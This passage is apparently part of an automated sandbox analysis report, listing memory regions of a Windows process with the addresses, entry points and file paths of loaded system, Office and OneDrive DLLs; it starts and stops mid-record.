(normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 627 start_va = 0x7ffd3e040000 end_va = 0x7ffd3e05efff monitored = 0 entry_point = 0x7ffd3e0437e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 628 start_va = 0x7ffd3e060000 end_va = 0x7ffd3e0d8fff monitored = 0 entry_point = 0x7ffd3e0676a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 629 start_va = 0x7ffd3e2b0000 end_va = 0x7ffd3e2c4fff monitored = 0 entry_point = 0x7ffd3e2b5740 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 630 start_va = 0x7ffd3e2d0000 end_va = 0x7ffd3e31afff monitored = 0 entry_point = 0x7ffd3e2e1590 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 631 start_va = 0x7ffd3e7e0000 end_va = 0x7ffd3e7fafff monitored = 0 entry_point = 0x7ffd3e7eaf40 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 632 start_va = 0x7ffd3e990000 end_va = 0x7ffd3e9a3fff monitored = 0 entry_point = 0x7ffd3e993710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 633 start_va = 0x7ffd3ea40000 end_va = 0x7ffd3ea5dfff monitored = 0 entry_point = 0x7ffd3ea4ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 634 start_va = 0x7ffd3ed50000 end_va = 0x7ffd3ed5bfff monitored = 0 entry_point = 0x7ffd3ed535c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 635 start_va = 0x7ffd3ed60000 end_va = 0x7ffd3ef08fff monitored = 0 entry_point = 0x7ffd3edb4060 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\gdiplus.dll") Region: id = 636 start_va = 0x7ffd40310000 end_va = 0x7ffd4038ffff monitored = 0 entry_point = 0x7ffd4033d280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 637 start_va = 0x7ffd40390000 end_va = 0x7ffd403b1fff monitored = 0 entry_point = 0x7ffd40392580 region_type = mapped_file name = "wcmapi.dll" filename = "\\Windows\\System32\\wcmapi.dll" (normalized: "c:\\windows\\system32\\wcmapi.dll") Region: id = 638 start_va = 0x7ffd403c0000 end_va = 0x7ffd403fffff monitored = 0 entry_point = 0x7ffd403d6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 639 start_va = 0x7ffd404f0000 end_va = 0x7ffd40769fff monitored = 0 entry_point = 0x7ffd4050a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 640 start_va = 0x7ffd410e0000 end_va = 0x7ffd410f5fff monitored = 0 entry_point = 0x7ffd410e1d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 641 start_va = 0x7ffd41100000 end_va = 0x7ffd412b7fff monitored = 0 entry_point = 0x7ffd4116e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 642 start_va = 0x7ffd412c0000 end_va = 0x7ffd41307fff monitored = 0 entry_point = 0x7ffd412ca430 region_type = mapped_file name = "notificationobjfactory.dll" filename = "\\Windows\\System32\\NotificationObjFactory.dll" (normalized: "c:\\windows\\system32\\notificationobjfactory.dll") Region: id = 643 start_va = 0x7ffd41370000 end_va = 0x7ffd413cbfff monitored = 0 entry_point = 0x7ffd41387190 region_type = mapped_file name = "ninput.dll" filename = "\\Windows\\System32\\ninput.dll" (normalized: "c:\\windows\\system32\\ninput.dll") Region: id = 644 start_va = 0x7ffd413d0000 end_va = 0x7ffd41466fff monitored = 0 entry_point = 0x7ffd413dddc0 region_type = mapped_file name = "wlidprov.dll" filename = "\\Windows\\System32\\wlidprov.dll" (normalized: "c:\\windows\\system32\\wlidprov.dll") Region: id = 645 start_va = 0x7ffd41470000 end_va = 0x7ffd4147bfff monitored = 0 entry_point = 0x7ffd414714b0 region_type = mapped_file name = "notificationcontrollerps.dll" filename = "\\Windows\\System32\\NotificationControllerPS.dll" (normalized: "c:\\windows\\system32\\notificationcontrollerps.dll") Region: id = 646 start_va = 0x7ffd41480000 end_va = 0x7ffd414b6fff monitored = 0 entry_point = 0x7ffd414820a0 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 647 start_va = 0x7ffd414c0000 end_va = 0x7ffd417f9fff monitored = 0 entry_point = 0x7ffd414c8520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 648 start_va = 0x7ffd41800000 end_va = 0x7ffd4189dfff monitored = 0 entry_point = 0x7ffd41849d40 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\msvcp140.dll") Region: id = 649 start_va = 0x7ffd418a0000 end_va = 0x7ffd418b6fff monitored = 0 entry_point = 0x7ffd418ac440 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\vcruntime140.dll") Region: id = 650 start_va = 0x7ffd418c0000 end_va = 0x7ffd41ad3fff monitored = 0 entry_point = 0x7ffd418c1000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\grooveex.dll") Region: id = 651 start_va = 0x7ffd41ae0000 end_va = 0x7ffd41d6dfff monitored = 0 entry_point = 0x7ffd41bb0f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 652 start_va = 0x7ffd41d70000 end_va = 0x7ffd41d79fff monitored = 0 entry_point = 0x7ffd41d71350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 653 start_va = 0x7ffd41d80000 end_va = 0x7ffd41e6efff monitored = 0 entry_point = 0x7ffd41da29cc region_type = mapped_file name = "msvcr120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll") Region: id = 654 start_va = 0x7ffd41e70000 end_va = 0x7ffd41f15fff monitored = 0 entry_point = 0x7ffd41ebefec region_type = mapped_file name = "msvcp120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll") Region: id = 655 start_va = 0x7ffd41f20000 end_va = 0x7ffd420aefff monitored = 0 entry_point = 0x7ffd41f301d8 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\filesyncshell64.dll") Region: id = 656 start_va = 0x7ffd420b0000 end_va = 0x7ffd420d5fff monitored = 0 entry_point = 0x7ffd420c5cb0 region_type = mapped_file name = "npsm.dll" filename = "\\Windows\\System32\\NPSM.dll" (normalized: "c:\\windows\\system32\\npsm.dll") Region: id = 657 start_va = 0x7ffd420e0000 end_va = 0x7ffd4210afff monitored = 0 entry_point = 0x7ffd420e4240 region_type = mapped_file name = "abovelockapphost.dll" filename = "\\Windows\\System32\\AboveLockAppHost.dll" (normalized: "c:\\windows\\system32\\abovelockapphost.dll") Region: id = 658 start_va = 0x7ffd42110000 end_va = 0x7ffd4211cfff monitored = 0 entry_point = 0x7ffd42111ea0 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 659 start_va = 0x7ffd42120000 end_va = 0x7ffd4216cfff monitored = 0 entry_point = 0x7ffd42137de0 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 660 start_va = 0x7ffd42170000 end_va = 0x7ffd421f5fff monitored = 0 entry_point = 0x7ffd42191e10 region_type = mapped_file name = "notificationcontroller.dll" filename = "\\Windows\\System32\\NotificationController.dll" (normalized: "c:\\windows\\system32\\notificationcontroller.dll") Region: id = 661 start_va = 0x7ffd42200000 end_va = 0x7ffd422d9fff monitored = 0 entry_point = 0x7ffd42233c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Region: id = 662 start_va = 0x7ffd422e0000 end_va = 0x7ffd422f1fff monitored = 0 entry_point = 0x7ffd422e3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 663 start_va = 0x7ffd42300000 end_va = 0x7ffd4241ffff monitored = 0 entry_point = 0x7ffd42338310 region_type = mapped_file name = "applicationframe.dll" filename = "\\Windows\\System32\\ApplicationFrame.dll" (normalized: "c:\\windows\\system32\\applicationframe.dll") Region: id = 664 start_va = 0x7ffd42420000 end_va = 0x7ffd42445fff monitored = 0 entry_point = 0x7ffd42421cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 665 start_va = 0x7ffd42450000 end_va = 0x7ffd4252afff monitored = 0 entry_point = 0x7ffd424628b0 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 666 start_va = 0x7ffd42530000 end_va = 0x7ffd425c3fff monitored = 0 entry_point = 0x7ffd42569210 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 667 start_va = 0x7ffd425d0000 end_va = 0x7ffd42872fff monitored = 0 entry_point = 0x7ffd425f6190 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 668 start_va = 0x7ffd42880000 end_va = 0x7ffd4288bfff monitored = 0 entry_point = 0x7ffd428818b0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 669 start_va = 0x7ffd42890000 end_va = 0x7ffd428dcfff monitored = 0 entry_point = 0x7ffd4289d180 region_type = mapped_file name = "windows.immersiveshell.serviceprovider.dll" filename = "\\Windows\\System32\\windows.immersiveshell.serviceprovider.dll" (normalized: "c:\\windows\\system32\\windows.immersiveshell.serviceprovider.dll") Region: id = 670 start_va = 0x7ffd428e0000 end_va = 0x7ffd433eafff monitored = 0 entry_point = 0x7ffd42a2a540 region_type = mapped_file name = "twinui.dll" filename = "\\Windows\\System32\\twinui.dll" (normalized: "c:\\windows\\system32\\twinui.dll") Region: id = 671 start_va = 0x7ffd433f0000 end_va = 0x7ffd4343ffff monitored = 0 entry_point = 0x7ffd433f2580 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 672 start_va = 0x7ffd43440000 end_va = 0x7ffd438dffff monitored = 0 entry_point = 0x7ffd434d8740 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 673 start_va = 0x7ffd43a50000 end_va = 0x7ffd43a99fff monitored = 0 entry_point = 0x7ffd43a55800 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 674 start_va = 0x7ffd43ac0000 end_va = 0x7ffd43b29fff monitored = 0 entry_point = 0x7ffd43ad5e90 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 675 start_va = 0x7ffd43b30000 end_va = 0x7ffd43b94fff monitored = 0 entry_point = 0x7ffd43b34c50 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 676 start_va = 0x7ffd43ba0000 end_va = 0x7ffd43e13fff monitored = 0 entry_point = 0x7ffd43c10400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 677 start_va = 0x7ffd43e20000 end_va = 0x7ffd43eedfff monitored = 0 entry_point = 0x7ffd43e514c0 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 678 start_va = 0x7ffd43ef0000 end_va = 0x7ffd43fe8fff monitored = 0 entry_point = 0x7ffd43f38000 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 679 start_va = 0x7ffd43ff0000 end_va = 0x7ffd44004fff monitored = 0 entry_point = 0x7ffd43ff2c90 region_type = mapped_file name = "settingsyncpolicy.dll" filename = "\\Windows\\System32\\SettingSyncPolicy.dll" (normalized: "c:\\windows\\system32\\settingsyncpolicy.dll") Region: id = 680 start_va = 0x7ffd44010000 end_va = 0x7ffd440c0fff monitored = 0 entry_point = 0x7ffd440208f0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 681 start_va = 0x7ffd440e0000 end_va = 0x7ffd440f4fff monitored = 0 entry_point = 0x7ffd440e1ab0 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 682 start_va = 0x7ffd44130000 end_va = 0x7ffd4438cfff monitored = 0 entry_point = 0x7ffd441b8610 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 683 start_va = 0x7ffd44390000 end_va = 0x7ffd44398fff monitored = 0 entry_point = 0x7ffd44391480 region_type = mapped_file name = "wpportinglibrary.dll" filename = "\\Windows\\System32\\WpPortingLibrary.dll" (normalized: "c:\\windows\\system32\\wpportinglibrary.dll") Region: id = 684 start_va = 0x7ffd44670000 end_va = 0x7ffd446bafff monitored = 0 entry_point = 0x7ffd44687b70 region_type = mapped_file name = "veeventdispatcher.dll" filename = "\\Windows\\System32\\VEEventDispatcher.dll" (normalized: "c:\\windows\\system32\\veeventdispatcher.dll") Region: id = 685 start_va = 0x7ffd44840000 end_va = 0x7ffd4485afff monitored = 0 entry_point = 0x7ffd44841040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 686 start_va = 0x7ffd44860000 end_va = 0x7ffd44ae7fff monitored = 0 entry_point = 0x7ffd448bf670 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 687 start_va = 0x7ffd44af0000 end_va = 0x7ffd44af9fff monitored = 0 entry_point = 0x7ffd44af14c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 688 start_va = 0x7ffd44b00000 end_va = 0x7ffd44b0dfff monitored = 0 entry_point = 0x7ffd44b01460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 689 start_va = 0x7ffd44bf0000 end_va = 0x7ffd44c1afff monitored = 0 entry_point = 0x7ffd44bfc3c0 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 690 start_va = 0x7ffd44c20000 end_va = 0x7ffd44d2cfff monitored = 0 entry_point = 0x7ffd44c4f420 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 691 start_va = 0x7ffd44db0000 end_va = 0x7ffd44e0efff monitored = 0 entry_point = 0x7ffd44ddbce0 region_type = mapped_file name = "dsreg.dll" filename = "\\Windows\\System32\\dsreg.dll" (normalized: "c:\\windows\\system32\\dsreg.dll") Region: id = 692 start_va = 0x7ffd45200000 end_va = 0x7ffd4529ffff monitored = 0 entry_point = 0x7ffd45270910 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 693 start_va = 0x7ffd455c0000 end_va = 0x7ffd4566dfff monitored = 0 entry_point = 0x7ffd455d80c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 694 start_va = 0x7ffd45750000 end_va = 0x7ffd4575afff monitored = 0 entry_point = 0x7ffd45751d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 695 start_va = 0x7ffd45800000 end_va = 0x7ffd4586cfff monitored = 0 entry_point = 0x7ffd4580d750 region_type = mapped_file name = "photometadatahandler.dll" filename = "\\Windows\\System32\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\system32\\photometadatahandler.dll") Region: id = 696 start_va = 0x7ffd458c0000 end_va = 0x7ffd45914fff monitored = 0 entry_point = 0x7ffd458c3fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 697 start_va = 0x7ffd45a10000 end_va = 0x7ffd45a29fff monitored = 0 entry_point = 0x7ffd45a12430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 698 start_va = 0x7ffd45a30000 end_va = 0x7ffd45a45fff monitored = 0 entry_point = 0x7ffd45a319f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 699 start_va = 0x7ffd45aa0000 end_va = 0x7ffd45ae0fff monitored = 0 entry_point = 0x7ffd45aa4840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 700 start_va = 0x7ffd45b30000 end_va = 0x7ffd45b57fff monitored = 0 entry_point = 0x7ffd45b38c10 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 701 start_va = 0x7ffd45ca0000 end_va = 0x7ffd45e5ffff monitored = 0 entry_point = 0x7ffd45ca9e40 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 702 start_va = 0x7ffd45f00000 end_va = 0x7ffd45f0bfff monitored = 0 entry_point = 0x7ffd45f01470 region_type = mapped_file name = "dsclient.dll" filename = "\\Windows\\System32\\dsclient.dll" (normalized: "c:\\windows\\system32\\dsclient.dll") Region: id = 703 start_va = 0x7ffd45f60000 end_va = 0x7ffd45f6bfff monitored = 0 entry_point = 0x7ffd45f61860 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 704 start_va = 0x7ffd45f70000 end_va = 0x7ffd45f8ffff monitored = 0 entry_point = 0x7ffd45f71920 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 705 start_va = 0x7ffd45f90000 end_va = 0x7ffd45fa5fff monitored = 0 entry_point = 0x7ffd45f93380 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 706 start_va = 0x7ffd45fe0000 end_va = 0x7ffd46002fff monitored = 0 entry_point = 0x7ffd45fe99a0 region_type = mapped_file name = "networkstatus.dll" filename = "\\Windows\\System32\\NetworkStatus.dll" (normalized: "c:\\windows\\system32\\networkstatus.dll") Region: id = 707 start_va = 0x7ffd460b0000 end_va = 0x7ffd460e7fff monitored = 0 entry_point = 0x7ffd460c8cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 708 start_va = 0x7ffd46190000 end_va = 0x7ffd461a8fff monitored = 0 entry_point = 0x7ffd46194520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 709 start_va = 0x7ffd46790000 end_va = 0x7ffd46830fff monitored = 0 entry_point = 0x7ffd46793db0 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 710 start_va = 0x7ffd46860000 end_va = 0x7ffd468cffff monitored = 0 entry_point = 0x7ffd46882960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 711 start_va = 0x7ffd46920000 end_va = 0x7ffd469e7fff monitored = 0 entry_point = 0x7ffd469613f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 712 start_va = 0x7ffd469f0000 end_va = 0x7ffd46a50fff monitored = 0 entry_point = 0x7ffd469f4b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 713 start_va = 0x7ffd46ec0000 end_va = 0x7ffd4707cfff monitored = 0 entry_point = 0x7ffd46eeaf90 region_type = mapped_file name = "windows.ui.immersive.dll" filename = "\\Windows\\System32\\Windows.UI.Immersive.dll" (normalized: "c:\\windows\\system32\\windows.ui.immersive.dll") Region: id = 714 start_va = 0x7ffd47080000 end_va = 0x7ffd47401fff monitored = 0 entry_point = 0x7ffd470d1220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 715 start_va = 0x7ffd47410000 end_va = 0x7ffd47545fff monitored = 0 entry_point = 0x7ffd4743f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 716 start_va = 0x7ffd48590000 end_va = 0x7ffd48638fff monitored = 0 entry_point = 0x7ffd485b9010 region_type = mapped_file name = "windows.ui.dll" filename = "\\Windows\\System32\\Windows.UI.dll" (normalized: "c:\\windows\\system32\\windows.ui.dll") Region: id = 717 start_va = 0x7ffd48640000 end_va = 0x7ffd4874dfff monitored = 0 entry_point = 0x7ffd4868eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 718 start_va = 0x7ffd48750000 end_va = 0x7ffd487b9fff monitored = 0 entry_point = 0x7ffd48759d60 region_type = mapped_file name = "wincorlib.dll" filename = "\\Windows\\System32\\wincorlib.dll" (normalized: "c:\\windows\\system32\\wincorlib.dll") Region: id = 719 start_va = 0x7ffd487c0000 end_va = 0x7ffd48857fff monitored = 0 entry_point = 0x7ffd487e3980 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 720 start_va = 0x7ffd48860000 end_va = 0x7ffd488fffff monitored = 0 entry_point = 0x7ffd488856b0 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 721 start_va = 0x7ffd48900000 end_va = 0x7ffd48981fff monitored = 0 entry_point = 0x7ffd48904ef0 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 722 start_va = 0x7ffd48990000 end_va = 0x7ffd489ecfff monitored = 0 entry_point = 0x7ffd48996c90 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 723 start_va = 0x7ffd489f0000 end_va = 0x7ffd48a40fff monitored = 0 entry_point = 0x7ffd489f25e0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 724 start_va = 0x7ffd48ac0000 end_va = 0x7ffd48acafff monitored = 0 entry_point = 0x7ffd48ac1a40 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 725 start_va = 0x7ffd48af0000 end_va = 0x7ffd48b03fff monitored = 0 entry_point = 0x7ffd48af50c0 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 726 start_va = 0x7ffd48b80000 end_va = 0x7ffd48bf9fff monitored = 0 entry_point = 0x7ffd48ba7630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 727 start_va = 0x7ffd48cb0000 end_va = 0x7ffd48cc5fff monitored = 0 entry_point = 0x7ffd48cb1b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 728 start_va = 0x7ffd48cd0000 end_va = 0x7ffd48d33fff monitored = 0 entry_point = 0x7ffd48ce5ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 729 start_va = 0x7ffd48d80000 end_va = 0x7ffd48e11fff monitored = 0 entry_point = 0x7ffd48dca780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 730 start_va = 0x7ffd49140000 end_va = 0x7ffd49150fff monitored = 0 entry_point = 0x7ffd49143320 region_type = mapped_file name = "wmiclnt.dll" filename = 